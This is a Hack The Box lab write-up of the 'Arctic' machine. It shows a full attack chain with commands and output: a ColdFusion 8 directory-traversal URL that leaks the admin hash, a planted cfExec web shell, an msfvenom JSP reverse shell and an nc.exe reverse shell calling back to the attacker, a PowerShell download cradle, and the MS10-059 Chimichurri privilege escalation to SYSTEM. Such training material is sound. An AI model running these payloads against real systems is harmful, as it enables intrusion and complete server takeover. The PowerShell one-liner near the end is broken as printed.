Arctic
Contents
Ports scanning
root@kali:~/HTB/Machines/Arctic# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.11 --rate=1000 Starting masscan 1.0.5 at 2019-11-16 04:02:44 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 8500/tcp on 10.10.10.11 Discovered open port 49154/tcp on 10.10.10.11 Discovered open port 135/tcp on 10.10.10.11
root@kali:~/HTB/Machines/Arctic# nmap -sC -sV -p135,8500,49154 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 23:06 EST Nmap scan report for arctic.htb (10.10.10.11) Host is up (0.044s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
ColdFusion
On port 8500, we discover a web server.
Browsing directories, we find an administrator directory. On URL:
http://10.10.10.11:8500/CFIDE/administrator/
LFI
The LFI returns the file password.properties.
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
The password is hashed with an unsalted sha1 algorithm. That can be find quickly in crackstation.net.
https://crackstation.net/ Hash Type Result 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 sha1 happyday
With the password, we have full access to ColdFusion console.
Download backdoor script
Download of cfm backdoor script
root@kali:~/HTB/Machines/Arctic# wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/web-backdoors/cfm/cfExec.cfm --2019-11-16 00:54:10-- https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/web-backdoors/cfm/cfExec.cfm Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.204.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.204.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 2187 (2.1K) [text/plain] Saving to: ‘cfExec.cfm’ cfExec.cfm 100%[=============================================>] 2.14K --.-KB/s in 0s 2019-11-16 00:54:10 (14.5 MB/s) - ‘cfExec.cfm’ saved [2187/2187]
Create local webserver
root@kali:~/HTB/Machines/Arctic# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
Create a download scheduled task
The download task will download from our server the file cfExec.cfm and publish it on the root of the webserver.
Upload the webshell
We control the python web server until the file is downloaded.
root@kali:~/HTB/Machines/Arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.11 - - [16/Nov/2019 01:11:03] "GET /cfExec.cfm HTTP/1.1" 200 -
If we browse the application, we see our file in the root of the webserver.
User flag
Command: c:\windows\system32\cmd.exe Options: /c type c:\Users\tolis\Desktop\user.txt > c:\Coldfusion8\wwwroot\user.txt
root@kali:~/HTB/Machines/Arctic# wget http://10.10.10.11:8500/user.txt --2019-11-16 01:51:03-- http://10.10.10.11:8500/user.txt Connecting to 10.10.10.11:8500... connected. HTTP request sent, awaiting response... 200 OK Length: 32 [text/plain] Saving to: ‘user.txt’ user.txt 100%[===========================================>] 32 --.-KB/s in 0s 2019-11-16 01:51:20 (1.69 MB/s) - ‘user.txt’ saved [32/32] root@kali:~/HTB/Machines/Arctic# cat user.txt <USER FLAG>
Reverse shell with netcat
On the Web server.
root@kali:~/HTB/Machines/Arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.11 - - [16/Nov/2019 01:11:03] "GET /cfExec.cfm HTTP/1.1" 200 -
10.10.10.11 - - [16/Nov/2019 01:29:54] "GET /nc.exe HTTP/1.1" 200 -
Run nc listener
root@kali:~/HTB/Machines/Arctic# nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Launch command
Command: c:\windows\system32\cmd.exe Options: /c c:\Coldfusion8\wwwroot\nc.exe 10.10.14.34 4444 -e c:\windows\system32\cmd.exe
But it doesn't work :(
jsp reverse shell
In the system summary, I saw that ColdFusion is using Java, so I take a shot at using a jsp reverse shell.
Upload the jsp file.
URL: http://10.10.14.34/jsp-reverse.jsp File: c:\Coldfusion8\wwwroot\CFIDE\jsp-reverse.jsp
Launch URL
http://10.10.10.11:8500/jsp-reverse.jsp in the browser give me error 500 :(
second reverse jsp shell
This time, the reverse shell will be generated with msfvenom, and connection parameter will be hard coded, instead of a form.
root@kali:~/HTB/Machines/Arctic# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.34 LPORT=4444 > rs.jsp Payload size: 1497 bytes
Upload the rs.jsp
We use the task scheduler to push the file.
http://10.10.14.34/rs.jsp c:\Coldfusion8\wwwroot\rs.jsp
Run the rs.jsp
root@kali:~/HTB/Machines/Arctic/work# wget http://10.10.10.11:8500/rs.jsp --2019-11-16 02:52:25-- http://10.10.10.11:8500/rs.jsp Connecting to 10.10.10.11:8500... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: ‘rs.jsp’ rs.jsp [ <=> ] 8 --.-KB/s in 0s 2019-11-16 02:52:42 (436 KB/s) - ‘rs.jsp’ saved [8]
And in the listener, the shell opens
root@kali:~/HTB/Machines/Arctic# nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.11. Ncat: Connection from 10.10.10.11:49867. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
User escalation
systeminfo
C:\ColdFusion8\runtime\bin>systeminfo ... OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7600 N/A Build 7600 ... Hotfix(s): N/A
The server is a Windows 2008 R2 without any hotfix.
Upload exploit MS10-059
Download the compiled exploit.
root@kali:~/HTB/Machines/Arctic# wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe --2019-11-16 03:18:15-- https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe Resolving github.com (github.com)... 140.82.113.4 Connecting to github.com (github.com)|140.82.113.4|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://raw.githubusercontent.com/egre55/windows-kernel-exploits/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe [following] --2019-11-16 03:18:15-- https://raw.githubusercontent.com/egre55/windows-kernel-exploits/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.32.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.32.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 784384 (766K) [application/octet-stream] Saving to: ‘Chimichurri.exe’ Chimichurri.exe 100%[===========================================>] 766.00K --.-KB/s in 0.1s 2019-11-16 03:18:15 (7.70 MB/s) - ‘Chimichurri.exe’ saved [784384/784384]
We upload the exploit with a new task schedule.
http://10.10.14.34/Chimichurri.exe c:\Coldfusion8\wwwroot\Chimichurri.exe
Open a new listener
root@kali:~/HTB/Machines/Arctic# nc -nvlp 5555 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::5555 Ncat: Listening on 0.0.0.0:5555
Run exploit
C:\ColdFusion8\wwwroot>Chimichurri.exe Chimichurri.exe
It doesn't work. This is the second exploit and the nc.exe file that doesn't work.
Analyze executable files
The file doesn't have the same size. I decide to download the files and compare them.
root@kali:~/HTB/Machines/Arctic# mkdir work root@kali:~/HTB/Machines/Arctic# cd work/ root@kali:~/HTB/Machines/Arctic/work# wget -q 10.10.10.11:8500/nc.exe root@kali:~/HTB/Machines/Arctic/work# wget -q 10.10.10.11:8500/41020.exe root@kali:~/HTB/Machines/Arctic/work# wget -q 10.10.10.11:8500/Chimichurri.exe
When I try to execute the files they doesn't work neither.
root@kali:~/HTB/Machines/Arctic/work# diff -y -W 139 --suppress-common-lines <(xxd 41020.exe) <(xxd ../41020.exe) | head -n 5 00000000: 4d5a 3f00 0300 0000 0400 0000 3f3f 0000 MZ?.........??.. | 00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ.............. 00000150: 0000 0000 0300 603f 0000 1000 0000 0000 ......`?........ | 00000150: 0000 0000 0300 6081 0000 1000 0000 0000 ......`......... 000001d0: 3f44 0a00 9400 0000 0000 0000 0000 0000 ?D.............. | 000001d0: 9044 0a00 9400 0000 0000 0000 0000 0000 .D.............. 00000200: 2e74 6578 7462 7373 3fe8 0200 0010 0000 .textbss?....... | 00000200: 2e74 6578 7462 7373 9ce8 0200 0010 0000 .textbss........ 00000250: 2e72 6461 7461 0000 3f4f 0100 0070 0900 .rdata..?O...p.. | 00000250: 2e72 6461 7461 0000 9d4f 0100 0070 0900 .rdata...O...p..
It seems all characters over 0x7f (127 in decimal) have been replaced by the value 0x3f. 0x3f is the question mark. it makes sense why nc.exe, jsp-reverse.jsp and the 2 binary exploits did not work. The schedule task is useless to transfer binary files.
Download file using powershell
Be sure to open the web server
root@kali:~/HTB/Machines/Arctic# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
And from the reverse shell
C:\ColdFusion8\wwwroot>echo $webclient = New-Object System.Net.WebClient > download.ps1 echo $webclient = New-Object System.Net.WebClient > download.ps1
C:\ColdFusion8\wwwroot>echo $webclient.DownloadFile("http://10.10.14.34/Chimichurri.exe","Chimichurri.exe") >> download.ps1 echo $webclient.DownloadFile("http://10.10.14.34/Chimichurri.exe","Chimichurri.exe") >> download.ps1
C:\ColdFusion8\wwwroot>powershell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile -NonInteractive -File download.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile -NonInteractive -File download.ps1
A log line is added to the web server
root@kali:~/HTB/Machines/Arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.11 - - [16/Nov/2019 22:46:26] "GET /Chimichurri.exe HTTP/1.1" 200 -
And this time the file seems to have the correct size. C:\ColdFusion8\wwwroot>dir Chimichurri.exe
dir 41020.exe Volume in drive C has no label. Volume Serial Number is F88F-4EA5
Directory of C:\ColdFusion8\wwwroot
18/11/2019 01:44 ▒▒ 784.384 Chimichurri.exe 1 File(s) 784.384 bytes 0 Dir(s) 33.180.762.112 bytes free
Update easier command line
IEX(New-Object Net.WbClient).downloadString('http://10.10.14.34/Chimichurri.exe)
Open a new listener
root@kali:~/HTB/Machines/Arctic# nc -nvlp 5555 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::5555 Ncat: Listening on 0.0.0.0:5555
Run the exploit
C:\ColdFusion8\wwwroot>Chimichurri Chimichurri /Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Usage: Chimichurri.exe ipaddress port
C:\ColdFusion8\wwwroot>Chimichurri 10.10.14.34 5555 Chimichurri 10.10.14.34 5555 /Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...
Administrator reverse shell
root@kali:~/HTB/Machines/Arctic# nc -nvlp 5555 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::5555 Ncat: Listening on 0.0.0.0:5555 Ncat: Connection from 10.10.10.11. Ncat: Connection from 10.10.10.11:54699. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\wwwroot>whoami whoami nt authority\system
Root flag
C:\ColdFusion8\wwwroot>cd .. cd ..
C:\ColdFusion8>cd .. cd ..
C:\>cd Users cd Users
C:\Users>cd Administrator cd Administrator
C:\Users\Administrator>cd Desktop cd Desktop
C:\Users\Administrator\Desktop>type root.txt type root.txt <ROOT FLAG>
References
- egre55/windows-kernel-exploits
- Microsoft Security Bulletin MS10-059 - Important
- 3 ways to download files with PowerShell
Daniel Simao 00:24, 16 November 2019 (EST)
